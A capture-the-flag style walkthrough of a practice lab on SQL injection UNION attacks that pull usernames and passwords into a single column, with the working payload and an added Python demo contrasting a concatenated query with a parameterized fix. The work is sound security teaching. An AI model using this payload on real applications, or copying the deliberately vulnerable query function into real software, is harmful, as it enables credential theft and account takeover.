1.6 Lab: SQL injection UNION attack, retrieving multiple values in a single column | 2023
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables. The database contains a different table called users, with columns called username and password | Karthikeyan Nagaraj
Description
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
Solution
- Use the technique from the previous lab to find the number of columns.
- We found that there are 2 columns, so we have to test each column separately with a random string.
- Replace the NULL in the 1st column with any string; if that throws an error, put the string in place of the next NULL instead.
- Now we know that the second column is the one that accepts string data.
- So, paste the query below to retrieve all the data through that particular column. The || operator joins username and password with a ~ separator, so both values come back in the single usable column:
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
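Why this payload works, and the fix that stops it, shown as an added example (not code from the original post or from the lab): the decoded payload is run against a constructed in-memory SQLite stand-in, first through a string-concatenated query and then through a parameterized one. The products table, its columns, the sample rows and the function names are assumptions.

```python
import sqlite3
from urllib.parse import unquote_plus

# Payload from the walkthrough, URL-decoded ('+' becomes a space).
PAYLOAD = unquote_plus("'+UNION+SELECT+NULL,username||'~'||password+FROM+users--")

def make_db():
    """Constructed stand-in for the lab database; schema and rows are made up."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, description TEXT, category TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Mug', 'A plain mug', 'Gifts');
        INSERT INTO users VALUES ('administrator', 'constructed-pw-1'),
                                 ('wiener', 'constructed-pw-2');
    """)
    return db

def filter_vulnerable(db, category):
    # Weak: the category value is concatenated into the SQL text, so a quote
    # in the input closes the string literal and the rest is parsed as SQL.
    sql = "SELECT name, description FROM products WHERE category = '" + category + "'"
    return db.execute(sql).fetchall()

def filter_parameterized(db, category):
    # Fixed: the value is bound as data and is never parsed as SQL.
    sql = "SELECT name, description FROM products WHERE category = ?"
    return db.execute(sql, (category,)).fetchall()

def split_leaked(rows):
    # UNION rows carry NULL in column 1 and 'username~password' in column 2.
    return dict(val.split("~", 1) for first, val in rows if first is None)

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", split_leaked(filter_vulnerable(db, PAYLOAD)))
    print("parameterized:", filter_parameterized(db, PAYLOAD))
```

With the bound parameter the whole payload is compared as a literal category name, so the filter simply matches no products.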
Thank you for Reading!
Happy Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng